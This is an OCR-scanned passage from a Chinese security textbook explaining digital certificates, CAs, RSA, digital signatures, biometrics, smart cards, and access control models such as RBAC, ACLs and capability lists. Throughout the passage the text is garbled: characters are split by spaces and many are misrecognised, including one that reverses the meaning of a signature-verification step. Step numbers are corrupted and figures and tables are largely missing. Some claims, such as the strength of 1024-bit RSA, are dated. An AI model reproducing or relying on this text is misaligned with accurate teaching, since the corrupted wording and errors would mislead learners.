书 体系 结构 。 数 字 认 证 证 书 是 以 数字 证 书 为 核心 的 加 密 技 术 ， 通 过 运用 对 称 和 非 对 称 密码 体 
制 等 密码 技术 建立 起 一 套 严密 的 身份 认证 系统 ， 从 而 保证 : 信息 除 发 送 方 和 接收 方 外 不 被 其 
他 人 窃取 信息 在 传输 过 程 中 不 被 算 改 ;发 送 方 能 够 通过 数字 证 书 来 确认 接收 方 的 身份 ; 发 
送 方 对 于 自己 的 信息 不 能 抵赖 。 
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证 书 是 由 证 书签 证 机 关 (CA) 签 发 的 对 用 户 的 公 钥 的 认证 。CA 机 构 ， 又 称 为 证 书 授权 
(Certificate Authority) 中 心 ， 作 为 电子 商务 交易 中 受信 任 的 第 三 方 ， 承 担 公 钥 体系 中 公 钥 的 合 
法 性 检验 的 责任 。CA 中 心 为 每 个 使 用 公开 密 钥 的 用 户 发 放 一 个 数字 证 书 ， 数 字 证 书 的 作用 
是 证 明证 书 中 列 出 的 用 户 合法 拥有 证 书 中 列 出 的 公开 密 钥 。CA 机 构 的 数字 签名 使 得 攻击 者 
不 能 伪造 和 自 改 证 书 。 它 负责 生成 、 分 配 并 管理 所 有 参与 网 上 交易 的 个 体 所 需 的 数字 证 书 ， 
因此 是 安全 电子 交易 的 核心 环节 。 
数字 证 书 的 颁发 过 程 一 般 为 : 用 户 首先 生成 自己 的 密 钥 对 ， 并 将 公共 密 钥 及 部 分 个 人 身 
份 信息 传送 给 认证 中 心 。 认 证 中 心 在 核实 身份 后 ， 将 执行 一 些 必 要 的 步 又， 以 确信 请 求 确实 
由 用 户 发 送 而 来 ， 然 后 ， 认 证 中 心 将 发 给 用 户 一 个 数字 证 书 ， 该 证 书 内 包含 用 户 的 个 人 信息 
和 他 的 公 钥 信息 ， 同 时 还 附 有 认证 中 心 的 签名 信息 。 用 户 就 可 以 使 用 自己 的 数字 证 书 进行 相 
关 的 各 种 活动 。 数 字 证 书 由 独立 的 证 书 发 行 机 构 发 布 。 数 字 证 书 各 不 相同 ， 每 种 证 书 可 提供 
不 同 级 别 的 可 信和 度 。 可 以 从 证 书 发 行 机 构 获得 自己 的 数字 证 书 。 

数字 证 书 的 工作 原理 : 它 采 用 公 钥 体制 ， 即 利用 一 对 互相 匹配 的 密 钥 进行 加 密 、 解 密 。 
每 个 用 户 自己 设 定 一 把 特定 的 仅 为 本 人 所 知 的 私有 密 钥 ( 私 钥 )， 用 它 进行 解密 和 签名 ， 同 时 
设 定 一 把 公共 密 钥 ( 公 钥 ) 并 由 本 人 公开 ， 为 一 组 用 户 所 共享 ， 用 于 加 密 和 验证 签名 。 当 发 送 
一 份 保密 文件 时 ， 发 送 方 使 用 接收 方 的 公 钥 对 数据 加 密 ， 而 接收 方 则 使 用 自己 的 私 钥 解密 ， 
这 样 信息 就 可 以 安全 无 误 地 到 达 目 的 地 了 。 通 过 数字 的 手段 保证 加 密 过 程 是 一 个 不 可 逆 过程 ， 
即 只 有 用 私有 密 钥 才能 解密 。 在 公开 密 钥 密码 体制 中 ,常用 的 一 种 是 RSA 体制 。 其 数学 原理 
是 将 一 个 大 数 分 解 成 两 个 质数 的 乘积 ， 加 密 和 解密 用 的 是 两 个 不 同 的 密 钥 。 即 使 已 知 明文 、 
密 文 和 加 密 密 钥 (公开 密 钥 )， 想 要 推导 出 解密 密 钥 (私密 密 钥 )， 在 计算 上 是 不 可 能 的 。 按 当下 
计算 机 技术 水 平 ， 要 破解 1024 位 RSA 密 钥 ， 需 要 上 千年 的 计算 时 间 。 公 开 密 钥 技 术 解决 了 
密 钥 发 布 的 管理 问题 ， 商 户 可 以 公开 其 公开 密 钥 ， 而 保留 其 私有 密 钥 。 购 物 者 可 以 用 人 人 沸 
知 的 公开 密 钥 对 发 送 的 信息 进行 加 密 ， 安 全 地 传送 给 商户 ， 然 后 由 商户 用 自己 的 私有 密 钥 进 
行 解密 。 

用 户 也 可 以 采用 自己 的 私 钥 对 信息 加 以 处 理 ， 由 于 密 钥 仅 为 本 人 所 有 ， 这 样 就 产生 了 别 
人 无 法 生成 的 文件 ， 也 就 形成 了 数字 签名 。 数 字 签名 的 工作 原理 ， 发送 报 文 时 ， 发 送 方 用 一 
个 哈 希 函数 从 报 文 文本 中 生成 报 文摘 要 ， 然 后 用 自己 的 私人 密 钥 对 这 个 摘要 进行 加 密 ， 这 个 
加 密 后 的 摘要 将 作为 报 文 的 数字 签名 和 报 文 一 起 发 送 给 接收 方 ， 接 收 方 首先 用 与 发 送 方 一 样 
的 哈 希 函数 从 接收 到 的 原始 报 文中 计算 出 报 文摘 要 ， 接 着 再 用 发 送 方 的 公用 密 钥 来 对 报 文 附 
加 的 数字 签名 进行 解密 , 如 果 这 两 个 摘要 相同 , 那么 接收 方 就 能 确认 该 数字 签名 是 发 送 方 的 。 

使 用 数字 签名 可 以 确定 消息 确实 是 由 发 送 方 签名 并 发 出 来 的 ， 并 且 能 确定 消息 的 完整 
性 。 因 为 数字 签名 的 特点 是 它 代表 了 文件 的 特征 ， 文 件 如 果 发 生 改变 ， 数 字 摘 要 的 值 也 将 发 
生变 化 。 不 同 的 文件 将 得 到 不 同 的 数字 摘要 。 一 次 数字 签名 涉及 一 个 哈 希 函数 、 发 送 者 的 公 
钥 和 发 送 者 的 私 钥 。 

从 下 面 的 例子 中 ， 我 们 就 可 以 分 清 数字 证 书 与 数字 签名 的 用 途 和 关系 : 

公司 A 与 公司 B 是 贸易 伙伴 ， 他 们 之 间 经 常 通信 。 为 了 安全 ， 决 定 采用 数字 签名 技术 。 
通信 过 程 如 下 : 
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(1) 公司 A 用 哈 希 算法 将 信件 内 容 进行 处 理 ， 生 成 摘要 信息 。 

Q) 公司 A 用 自己 的 私 钥 对 第 一 步 生成 的 摘要 信息 进行 加 密 ， 形 成 “数字 签名 ”。 

6) 公司 A 将 原始 信件 和 数字 签名 一 起 发 送 给 公司 Bo 

(4) 公司 B 收 到 信件 后 ， 取 出 数字 签名 ， 并 用 公司 A 的 公用 密 钥 进行 解密 ， 得 到 摘要 
信息 。 

(5) 公司 B 将 原始 信件 用 与 公司 A 同样 的 哈 希 算法 进行 处 理 ， 得 到 摘要 信息 。 

(6) 公司 B 将 第 4 步 与 第 5 步 中 的 摘要 信息 进行 比较 ， 如 果 相 同 ， 表 明 原 始 信 件 违背 算 
改 ， 否 则 原始 信件 已 被 算 改 。 

按照 上 述 流程 似乎 可 以 确保 信件 的 真实 性 ， 但 是 也 不 一 定 。 假 设 ， 公 司 C 悄悄 用 自己 的 
公开 密 钥 更 换 了 公司 B 拥有 的 公司 A 的 公开 密 钥 ， 那 么 公司 C 就 可 以 假冒 公司 A 发 送信 件 
给 公司 B。 

为 了 避免 上 述 情况 的 发 生 ， 我 们 可 以 让 公司 A 申请 数字 证 书 ， 具 体 过 程 如 下 : 

(1) 公司 A 将 自己 的 公开 密 钥 和 其 他 相关 信息 送 到 可 信赖 的 证 书 颁 发 机 构 (CA) 申 请 数字 
证 书 。 

(2) CA 用 自己 的 私 钥 对 公司 A 的 公 钥 和 个 人 信息 进行 加 密 , 生成 数字 证 书 颁 发 给 公司 A。 

(3) 公司 A 发 信 给 公司 B 时 ， 除 了 加 上 数字 签名 也 要 附加 数字 证 书 。 

(à) 公司 B 收 到 信件 后 ， 用 CA 机 构 的 公 钥 对 数字 证 书 进行 解密 ， 取 出 公司 A 的 公 钥 。 

(5) 用 公 钥 对 公司 A 的 信件 进行 确认 。( 重 复数 字 签 名 的 验证 步骤 ) 

通过 上 述 的 例子 ， 我 们 看 到 运用 “数字 认证 ”和 “数字 签名 技术 ” 可 以 做 到 数据 的 机 
密 、 身 份 鉴别 、 报 文 的 完整 性 、 报 文 的 不 可 否认 性 。 


2.2.3 ”生物 认证 


前 面 讨论 了 利用 “数字 证 书 ” 和 “数字 签名 ”进行 身份 验证 的 方法 ， 由 于 这 两 种 技术 常 
用 于 网 络 通信 认证 ， 基 于 本 地 认证 的 话 ， 往 往 会 不 够 实际 。 现 在 我 们 介绍 一 种 常见 的 本 地 认 
证 手段 一 一 生物 认证 。 

生物 认证 也 称 作 生物 识别 ， 它 是 通过 计算 机 利用 人 体毛 固有 的 生理 特征 或 行为 特征 来 进 
行 个 人 身份 鉴定 。 人 类 特征 可 以 分 为 两 种 : 一 种 是 人 的 生物 特征 ; 另 一 种 是 人 的 行为 特征 。 
使 用 生物 特征 作为 身份 证 明 与 人 类 历史 一 样 悠久 。 通 过 声音 、 外 表 来 识别 一 个 人 ， 通 过 易 容 
术 来 冒充 一 个 人 ， 这 在 古代 就 被 广泛 使 用 ， 这 一 点 在 金庸 先生 的 小 说 中 也 有 类 似 的 描述 。 利 
用 人 类 的 生物 特征 进行 身份 识别 的 历史 已 经 很 长 了 , 特别 是 在 侦破 犯罪 案件 中 。 法 国 在 1870 
年 前 的 40 多 年 中 ， 一 直 使 用 一 种 称 为 Bertillon 的 系统 ， 它 通过 测量 人 体 各 部 分 的 尺寸 来 识 
别 不 同 的 罪犯 ， 如 前 臂 长 度 、 各 手指 长 度 、 身 高 、 头 的 宽度 、 脚 的 长 度 等 。 

生物 认证 就 是 通过 生物 学 特征 和 行为 特征 来 辨识 每 个 人 的 自动 化 方法 。 常 用 特征 有 指 
纹 、 声 音 、 眼 睛 、 脸 部 或 者 以 上 特征 的 综合 。 当 给 定 用 户 一 个 账号 ， 系 统管 理 员 要 采用 一 系 
列 措施 ， 在 一 个 可 接受 的 错误 程度 内 识别 该 用 户 。 只 要 该 用 户 访问 系统 ， 生 物 认 证 机 制 就 要 
验证 用 户 的 身份 。 只 要 与 声明 用 户 身份 关联 的 已 知 数据 进行 比较 ， 就 可 以 确定 该 用 户 是 得 到 
认证 还 是 被 拒绝 。 人 的 特征 具有 很 高 的 个 体 性 ， 世 界 上 几乎 没有 任何 两 个 人 的 特征 是 完全 相 
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同 的 ， 所 以 这 种 方法 的 安全 性 极 高 ， 几 乎 不 能 伪造 ， 对 于 不 经 意 的 使 用 也 没有 什么 副作用 ， 
但 一 般 来 讲 ， 采 用 这 种 方法 费用 都 很 昂贵 。 

人 的 下 意识 动作 也 会 留 下 一 定 特征 ， 不 同 的 人 对 同一 个 动作 会 留 下 不 同 的 特征 ， 这 方面 
最 常见 的 例子 是 手写 签名 。 手写 签名 是 一 种 历史 悠久 的 身份 验证 的 方法 。 商 人 之 间 签 订 合 同 、 
政府 间 签 署 协议 、 某 组 织 下 发 文件 等 活动 都 需要 有 相应 负责 人 的 签字 ， 以 表明 签字 人 对 文件 
的 认可 。 频 繁 进行 签名 的 人 对 这 一 动作 已 经 司空 见 惯 ， 所以， 签名 已 经 成 了 一 种 条 件 反射 的 
动作 ， 它 已 经 不 受 手臂 肌肉 的 人 为 控制 ， 从 而 成 为 一 种 下 意识 的 动作 。 这 种 动作 的 结果 会 留 
下 许多 特征 ， 如 书写 时 的 用 力 程度 、 笔 记 的 特点 等 ,根据 这 些 特征 就 能 认证 出 签名 人 的 身份 。 


2.2.4” 微 处 理 器 认证 


目前 , 在 我 们 的 生活 中 , 经 常见 到 一 种 微 处 理 器 认证 的 设备 就 是 智能 卡 。 比 如 ,银行 卡 、 
公交 IC 卡 和 手机 SIM 卡 等 。 智 能 卡 的 组 件 包 括 : 微 处 理 器 、 内 存 和 一 个 集成 到 包装 在 塑料 
上 中 的 单 芯片 上 的 串 行 接口 。 
智能 卡 又 分 为 接触 式 和 非 接触 式 两 种 : 
。 接触 式 IC 卡 必须 将 卡片 插入 主机 的 卡 口内 ， 通 过 有 线 方式 进行 数据 传输 。 例 如 ， 我 
们 现在 常用 的 银行 卡 、 手 机 SIM 卡 等 。 
。 非 接触 式 IC 卡 无 须 和 主机 接触 ， 通 过 无 线 方式 就 能 传输 数据 。 例 如 ， 我 们 的 公交 一 
卡通 、 门 禁 卡 等 。 
。 智能 卡 的 用 途 可 分 为 : 身份 识别 ， 支 付 工具 ， 加 密 /解密 ， 信 息 处 理 ， 医 疗 记 录 等 。 
。 身份 识别 : 利用 卡片 内 含 的 微 处 理 器 对 数据 进行 数学 计算 , 确认 持 有 人 的 身份 唯一 性 。 
。 支付 工具 : 卡片 内 置 计数 器 茶 代 成 货币 。 如 我 们 常见 的 各 种 消费 卡 。 
€ 加密/ 解密， 卡片 自身 就 是 一 把 密 钥 ， 对 信息 进行 加 密 或 者 解密 。 
。 信息 处 理 ， 卡 片 内 包含 个 人 的 基本 信息 ， 或 者 通过 终端 进行 信息 处 理 。 如 身份 证 、 
医保 卡 等 。 
另外 ,在 基于 证 书 的 认证 系统 中 ,智能 卡 可 以 很 好 地 对 私 钥 进 行 保护 。 因 为 智能 卡 与 计算 
机 是 分 离 的 , 并 且 它 包含 了 一 块 用 来 保存 私 钥 和 证 书 副本 的 计算 机 芯片 , 并 且 能 进行 相关 处 理 。 
我 们 在 选择 基于 微 处 理 器 认证 方式 的 智能 卡 时 ， 应 根据 具体 使 用 环境 来 选择 。 


2.3 访问 控制 技术 


2.3.1 访问 控制 概述 


访问 控制 是 在 保障 授权 用 户 能 获取 所 需 资源 的 同时 ， 拒 绝 未 授权 用 户 的 安全 机 制 ， 是 计 
算 机 安全 的 传统 重心 。 访问 控制 只 有 在 以 安全 为 目标 的 情况 下 才 有 意义 , 表示 一 种 安全 策略 。 
访问 控制 包括 三 个 要 素 : 主体 (Subjecb、 客 体 (Objecb 和 控制 策略 。 控 制 策略 是 主体 对 客 
体 的 访问 规则 集 。 规 则 集 定 义 了 主体 对 客体 的 作用 行为 和 客体 对 主体 的 条 件 约束 。 访 问 控制 
策略 体现 了 一 种 授权 行为 ， 也 就 是 客体 对 主体 的 权限 允许 ， 这 种 允许 不 能 超越 规则 集 。 关 于 
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主体 和 客体 的 概念 如 下 : 
。 主体 ; 通常 指 用 户 ， 或 代表 用 户 意 图 运行 进程 或 设备 。 主 体 是 访问 操作 的 主动 发 起 
者 ， 它 是 系统 中 信息 流 的 启动 者 ， 可 以 使 信息 流 在 实体 之 间 流 动 。 

。 客体 : 通常 是 指 信 息 的 载体 或 从 其 他 主体 或 客体 接收 信息 的 实体 。 

例如 ， 当 我 们 登录 计算 机 系统 时 ， 先 进行 认证 ， 认 证 通过 后 ， 访 问 控制 机 制 将 根据 预先 
制定 的 规则 对 登录 用 户 访问 的 资源 进行 控制 ， 只 有 规则 允许 的 资源 才能 访问 。 访 问 方式 可 以 
是 获取 信息 、 修 改 信息 或 者 完成 某 种 功能 ， 一 般 是 读 、 写 或 执行 。 这 里 “登录 用 户 ”是 主体 ， 
访问 的 “资源 ”是 客体 ， 预 先 制定 的 “规则 ”就 是 控制 策略 。 

这 里 ， 对 客体 的 访问 ， 在 实现 上 又 分 为 “面向 标签 ”和 “面向 名 单 ” 两 种 方式 。 如 何 来 
理解 这 两 种 实现 方式 呢 ? 我 们 来 假设 一 下 : 首先 , 对 每 个 需要 保护 的 客体 都 建立 一 个 保护 墙 ， 
保护 墙 上 留 有 一 个 门 ， 门 前 有 一 名 门卫 ， 然后， 要 求 对 客体 的 访问 都 首先 在 门 前 接受 门卫 的 
检查 。 那 么 ， 当 主体 对 客体 进行 访问 时 ， 在 面向 标签 的 实现 中 ， 门 卫 手中 持 有 一 份 对 一 个 客 
体 的 描述 。 在 访问 活动 中 , 主体 携带 一 张 标签 ,标签 上 有 一 个 客体 的 标识 和 可 以 访问 的 方式 ， 
门卫 把 主体 所 持 标签 中 的 客体 标识 与 自己 手中 的 客体 标识 进行 对 比 ， 以 确定 是 否 允 许 访问 
在 面向 名 单 的 实现 中 ， 门 卫 手 中 持 有 一 份 所 有 授权 主体 的 名 单 及 相应 的 访问 方式 ， 在 访问 活 
动 中 ， 主 体 出 示 自 己 的 身份 标识 ， 门 卫 从 名 单 中 查找 ， 检 查 主体 是 否 记 录 在 名 单 上 ， 以 确定 
是 否 允 许 访 问 。 

我 们 之 所 以 对 客体 的 访问 控制 采取 严格 的 控制 策略 ， 是 为 了 满足 以 下 几 个 要 求 : 

。 机 密 性 要 求 ， 防 止 信息 泄露 给 未 授权 的 用 户 。 一 般 来 说 ， 系 统 中 的 某 些 信息 非常 重 

要 ， 如 公司 的 财务 信息 以 及 个 人 用 户 的 信用 卡 账 号 等 。 对 于 这 些 信息 来 说 ， 任 何 未 
经 授权 的 信息 泄露 都 会 给 企业 和 个 人 带 来 损失 。 

e 完整 性 要 求 ， 防 止 未 授权 的 用 户 对 信息 的 修改 。 完 整 性 要 求 是 为 了 保证 系统 资源 处 
于 一 个 有 效 的 、 符 合 预期 的 状态 ， 防 止 资源 被 不 正确 或 不 适当 地 修改 。 同 时 ， 也 为 
了 维护 系统 不 同 部 分 的 一 致 性 。 

。 可 审计 性 要 求 ， 防 止 用 户 对 访问 过 某 信息 或 执行 过 茶 一 操作 进行 否认 。 

。 可 用 性 要 求 ， 保 证 授权 用 户 对 系统 信息 的 可 访问 性 。 可 用 性 是 为 了 保证 系统 顺利 工 
作 ， 即 保证 已 经 获得 授权 的 用 户 对 系统 信息 的 可 访问 性 。 当 系统 可 用 性 要 求 有 冲突 
时 ， 必 须 创建 新 的 安全 规则 。 如 果 系 统 的 安全 性 很 好 ， 但 某 些 情 况 下 不 可 用 ， 那 么 
这 个 系统 也 不 是 一 个 成 功 的 系统 。 

控制 策略 为 了 满足 上 述 几 个 要 求 ， 在 对 访问 控制 安全 机 制 进行 设计 时 ， 必 须 遵循 以 下 几 
个 原则 : 

。 最 小 权限 原则 ， 分 配给 系统 中 的 每 个 程序 和 每 个 用 户 的 权限 应 该 是 它们 完成 工作 所 

必须 享有 的 权限 的 最 小 集合 ， 这 和 “需要 知道 ”原则 类 似 。 如 果 主 体 不 需要 访问 特 
定 客体 ， 则 主体 就 不 应 该 拥有 访问 这 个 客体 的 权限 。 

。 ”自动 防 故障 默认 原则 ， 访 问 判定 应 建立 在 显 式 授权 而 不 是 隐 式 授权 的 基础 上 。 显 式 
授权 指定 的 是 主体 应 该 拥有 的 权限 ， 隐 式 授权 指定 的 是 主体 不 应 该 拥有 的 权限 。 默 
认 情 况 下 ， 没 有 明确 授权 的 访问 方式 ， 应 该 视 为 不 允许 的 访问 方式 。. 
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。 权限 分 离 原 则 ， 为 一 项 权限 划分 出 多 个 决定 因素 ， 仅 当 所 有 决定 因素 均 具 备 时 ， 才 
能 行使 该 项 权限 。 例 如 ， 一 个 档案 柜 设 有 两 把 钥匙 ， 由 两 个 人 掌管 ， 仅 当 两 个 人 都 
提供 钥 是 时 ， 档 案 柜 才 能 打开 。 如 果 其 中 任何 一 人 不 提供 钥匙 ， 都 无 法 打开 档案 柜 。 
同样 ， 系 统 在 对 资源 访问 授权 时 也 至 少 应 该 满足 两 个 条 件 。 这 种 方法 提供 了 一 种 资 
源 的 细 粒 度 访问 控制 ， 也 保证 了 访问 的 合法 性 。 

。 完全 仲裁 原则 ， 对 每 个 客体 的 每 次 访问 都 必须 经 过 检查 ， 以 确认 是 否 已 经 得 到 授权 。 
只 要 主体 发 出 对 某 客体 的 访问 请 求 ， 操 作 系统 都 对 该 操作 进行 仲裁 。 操 作 系统 需要 
检查 该 主体 是 否 被 允许 访问 该 客体 。 如 果 人 允许 ， 操 作 系 统 将 提供 访问 所 需 的 资源 。 
如 果 这 个 主体 再 次 请 求 对 该 客体 的 访问 ， 操 作 系统 必须 再 次 检查 这 个 主体 是 否 还 被 
允许 执行 这 种 访问 。 

。 开放 式 设计 原则 ， 不 应 该 把 保护 机 制 的 抗 攻 击 能 力 建立 在 设计 保密 的 基础 之 上 ， 应 
该 在 设计 公开 的 环境 中 设法 增强 保护 机 制 的 防御 能 力 。 

。 最 小 公共 机 制 原则 ， 尽 量 减少 由 两 个 以 上 用 户 共用 和 被 所 有 用 户 依赖 的 机 制 数量 。 
每 个 共享 机 制 都 是 一 条 潜在 的 用 户 间 的 信息 通路 ， 要 谨慎 设计 ， 避 免 无 意 中 破坏 安 
全 性 。 应 证 明 为 所 有 用 户 服 务 的 机 制 能 满足 每 个 用 户 的 要 求 。 

。 机 制 经 济 性 原则 ， 保 护 机 制 应 设计 得 尽 可 能 简单 短小 。 如 果 设 计 和 实现 机 制 简单 ， 
则 存在 错误 的 可 能 性 就 小 ， 进 程 的 测试 也 就 简单 。 有 些 设计 和 实现 中 的 错误 可 能 产 
生意 想不到 的 结果 ， 而 这 些 错误 在 常规 使 用 中 察觉 不 到 。 简 单 短 小 的 设计 是 这 类 工 
作成 功 的 关键 。 

。 心理 可 接受 性 原则 ， 为 使 用 户 方便 自如 地 正确 运用 保护 机 制 ， 用 户 界 面 应 设计 得 便 
于 使 用 。 可 以 理解 为 安全 机 制 可 能 给 系统 增加 了 额外 负担 ， 但 这 种 负担 必须 是 最 小 
的 而 且 合理 。 


2.3.2 ”组 和 角色 


上 面 我 们 谈 到 , 访问 控制 就 是 主体 访问 客体 时 所 享有 的 权限 。 目 前 主要 采用 基于 “角色 ” 
的 访问 控制 技术 。 它 实际 上 是 一 种 访问 模型 一 一 “用 户 -角色 -权限 ”， 也 就 是 说 ， 用 户 处 于 什 
么 样 的 角色 ， 他 就 拥有 基于 这 个 角色 的 权限 。 

基于 角色 的 访问 控制 模型 (Role-Based Access Control, RBAC) 是 一 种 较 新 且 广 为 使 用 的 访 
问 控制 机 制 ， 它 是 将 权限 赋予 角色 。 我 们 来 看 如 图 2-2 所 示 的 图 示 : 


文件 F 


图 2-2 RBAC 示意 图 
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从 图 2-2 中 ， 我 们 可 以 看 到 文件 F 被 guest 用 户 组 和 admin 用 户 组 共同 拥有 ， 而 每 个 上 
户 组 拥有 的 权限 不 同 : 

guest 用 户 组 1 读 的 权限 (R) 

系统 用 户 组 2 ” 读 的 权限 (R)， 写 的 权限 (W)， 执 行 权 限 CO) 

根据 不 同 的 用 户 组 所 拥有 的 权限 ， 用 户 A 和 B 也 拥有 不 同 的 权限 。 用 户 A 作为 guest 
用 户 ， 那 他 只 拥有 读 的 权限 ; 用户 B 因为 属于 admin 用 户 组 ， 则 他 同时 拥有 读 、 写 和 执行 的 
权限 。 我 们 结合 上 面 的 图 例 给 出 下 面 几 个 定义 : 

。 用 户 : 是 对 数据 对 象 进行 操作 的 主体 ， 可 以 是 人 、 机 器 人 和 计算 机 等 。 

。 角色 : 这 个 概念 源 于 实际 工作 中 的 职务 ; 一 个 具体 职务 代表 了 在 工作 中 处 理 某 些 事 

务 的 权利 。 

。 权限 : 是 对 某 一 数据 对 象 可 操作 的 权利 。 

e 组 : 是 一 群 用 户 的 集合 ， 这 个 集合 中 的 用 户 在 系统 中 的 角色 相同 ， 拥 有 相同 的 权限 。 

基于 角色 的 访问 控制 RBAC) 的 基本 思想 是 ， 对 系统 操作 的 各 种 权限 不 是 直接 授予 具体 
的 用 户 ， 而 是 在 用 户 集合 与 权限 集合 之 间 建 立 一 个 角色 集合 。 每 一 种 角色 对 应 一 组 相应 的 权 
限 。 一 旦 用 户 被 分 配 了 适当 的 角色 后 ， 该 用 户 就 拥有 此 角色 的 所 有 操作 权限 。 这 样 做 的 好 处 
是 ， 不 必 在 每 次 创建 用 户 时 都 进行 分 配 权限 的 操作 ， 只 要 分 配 用 户 相应 的 角色 即 可 ， 而 且 角 
色 的 权限 变更 比 用 户 的 权限 变更 要 少 得 多 ， 这 样 将 简化 用 户 的 权限 管理 ， 减 少 系统 的 开销 。 

在 系统 中 实现 基于 角色 的 访问 控制 需要 五 张 表 : 

。 用 户 表 : 操作 系统 的 实际 用 户 表 ， 存 储 用 户 的 基本 信息 一 一 账户 、 姓 名 、 密 码 等 。 

。 角色 表 : 根据 用 户 不 同 的 工作 岗位 划分 为 不 同 的 职责 ， 在 系统 中 映射 为 不 同 的 角色 。 

。 权限 表 : 不 同 的 权限 所 能 操作 的 资源 集合 。 

。 用 户 到 角色 映射 表 : 用 户 和 角色 对 应 关系 表 。 

。 角色 到 权限 映射 表 : 角色 权限 的 集合 。 

正如 我 们 图 2-2 中 的 例子 , gues 用 户 登录 系统 (用 户 表 ), 他 是 普通 用 户 ( 角 色 表 , 权限 表 )， 
所 以 拥有 的 权限 是 “只 读 ”(“ 用 户 到 权限 的 映射 表 ” 和 “和 角色 到 权限 的 映射 表 ”); admin 
用 户 因 为 是 管理 员 的 角色 ， 所 以 拥有 全 部 的 读 、 写 、 执 行 权限 。 


2.3.3 ”访问 控制 技术 


基于 角色 的 访问 控制 虽然 是 一 种 可 以 灵活 表达 和 实现 组 织 的 安全 策略 ， 并 且 接 近 生 活 ， 
但 是 实现 起 来 比较 繁琐 。 访问 控制 列表 (ACL，Access Control Lisb 是 另 一 种 访问 控制 管理 方 
式 ， 它 简化 了 权限 管理 。 

ACL 是 以 文件 为 中 心 建立 的 访问 权限 表 。 它 的 优点 是 实现 简单 ， 对 系统 性 能 影响 较 小 。 
从 技术 分 析 ，ACL 是 通过 使 用 和 维护 一 个 访问 控制 矩阵 (ACM., Access Control Matrix) 来 实现 
控制 管理 。 访 问 控制 矩阵 是 通过 托 阵 形式 表示 访问 控制 规则 和 授权 用 户 权 限 的 方法 。 访 问 控 
制 矩阵 是 二 维 的 ， 包 含 三 个 元 素 : 主体 (S)、 客 体 (O) 和 访问 权限 (P)。 对 主体 而 言 ， 拥 有 对 哪 
些 客体 的 哪些 访问 权限 ， 而 对 客体 而 言 ， 有 哪些 主体 可 以 对 它 实施 访问 。 将 这 种 关联 关系 加 
以 描述 ， 就 形成 了 访问 控制 矩阵 。 其 中 , 特权 用 户 或 特权 用 户 组 可 修改 主体 的 访问 控制 权限 。 
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K 2-2 是 一 个 简单 的 访问 控制 矩阵 : 


32-2 访问 控制 矩阵 


Program 1 


其 中 S1. S2. S3 代表 主体 ，Filel、File2、File3 、Programl 代表 客体 ; R: 只 读 权限 、 
W: 写 权 限 、X: 执行 权限 。 我 们 可 以 看 出 : 访问 控制 列表 是 基于 访问 控制 矩阵 中 列 的 自主 
访问 控制 区 , 它 在 一 个 客体 上 附加 一 个 主体 明细 表 , 来 表示 各 个 主体 对 这 个 客体 的 访问 权限 。 
访问 控制 列表 机 制 适合 于 少数 需要 被 区 分 的 用 户 ， 并 且 这 些 用 户 大 都 比较 稳定 。 但 是 ， 
如 果 系 统 中 的 用 户 和 资源 (客体 ) 都 非常 多 ， 而 每 个 用 户 可 能 访问 的 资源 有 限 ， 将 出 现 庞大 的 
访问 控制 矩阵 中 存在 很 多 空 值 的 情况 ， 从 而 造成 矩阵 的 存储 空间 的 浪费 。 简 单 的 解决 方式 是 
将 访问 控制 矩阵 按 行 或 按 列 进行 划分 。 如 果 按 行 划分 ， 得 到 访问 控制 能 力 表 。 即 对 于 每 个 用 
户 ， 能 力 表 列 出 可 以 使 用 的 客体 和 对 客体 的 访问 能 力 。 如 果 按 列 进行 划分 ， 可 得 到 广泛 应 用 
的 访问 控制 列表 。 即 对 于 每 个 资源 ， 访 问 控制 列表 中 列 出 可 能 的 用 户 和 用 户 的 访问 权限 。 因 
此 ， 访 问 控制 矩阵 是 能 力 表 和 列表 的 综合 体现 ， 关 键 看 表 的 核心 是 用 户 还 是 文件 ， 以 用 户 为 
核心 ， 则 是 能 力 表 ( 行 表 )， 以 文件 为 核心 ， 则 是 列表 。 下 面 我 们 来 介绍 一 下 三 个 概念 ， 以 方 
便 我 们 后 面 章 节 的 学 习 : 
。 能 力 表 : “能 力 ” 是 访问 控制 中 的 一 个 重要 概念 ， 它 指 访问 请 求 者 所 拥有 的 一 个 有 
效 标签 ， 授 权 标签 表明 的 持 有 者 可 按 何 种 方式 访问 特定 的 客体 。 用 二 元 组 (x, y) 表 示 
对 一 个 客体 的 访问 能 力 ， 其 中 ，x 是 该 客体 的 唯一 的 名 字 ，y 是 对 该 客体 x 的 一 组 访 
问 权限 的 集合 。 访 问 控制 能 力 表 是 以 用 户 为 中 心 建立 访问 权限 表 。 

。 自主 访问 控制 ， 是 由 客体 的 属 主 对 自己 的 客体 进行 管理 ， 由 属 主 自己 决定 是 否 将 自 
己 客 体 的 访问 权 或 部 分 访问 权 授予 其 他 主体 ， 这 种 控制 方式 是 自主 的 。 比 如 ， 在 自 
主 访问 控制 下 ， 一 个 用 户 可 以 自主 选择 哪些 用 户 可 以 共享 他 的 文件 。 

。 强制 访问 控制 ， 用 于 将 系统 中 的 信息 分 密级 和 类 进行 管理 ， 以 保证 每 个 用 户 只 能 访 
问 到 那些 被 标明 可 以 由 他 访问 的 信息 的 一 种 访问 约束 机 制 。 通 俗 地 说 ， 在 强制 访问 
控制 下 ， 用 户 ( 或 其 他 主体 ) 与 文件 (或 其 他 客体 ) 都 被 标记 了 固定 的 安全 属性 (如 安全 
级 、 访 问 权限 等 )， 在 每 次 访问 发 生 时 ， 系 统 检测 安全 属性 以 便 确定 一 个 用 户 是 否 有 
权 访 问 该 文件 。 

有 一 种 技术 结合 了 访问 控制 列表 和 能 力 表 的 特性 一 一 锁 与 钥匙 ” 它 是 指 一 部 分 信息 ( 锁 ) 
与 客体 相关 联 ， 另 一 部 分 信息 (钥匙 ) 与 授权 访问 该 客体 的 主体 以 及 允许 主体 访问 客体 的 方式 
相关 联 。 当 主体 打算 访问 客体 时 ， 就 检查 主体 的 钥匙 集 。 如 果 主 体 有 一 把 钥匙 与 客体 的 任 一 
把 锁 相 对 应 ， 就 赋予 主体 正确 的 访问 类 型 。 

与 其 他 访问 控制 机 制 不 同 ， 锁 与 钥匙 具有 动态 的 特点 。 访 问 控制 列表 是 静态 的 ， 必 须 人 
为 进行 修改 。 而 锁 与 钥匙 会 因 响 应 系统 的 约束 、 增 加 条 目的 通用 指令 或 其 他 任何 因素 而 发 生 
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改变 ， 不 需要 手工 修改 。 

在 锁 与 钥匙 的 密码 学 实现 中 ， 客 体 o 由 一 个 密 钥 加 密 ， 主 体 拥有 解密 密 钥 。 为 了 访问 客 
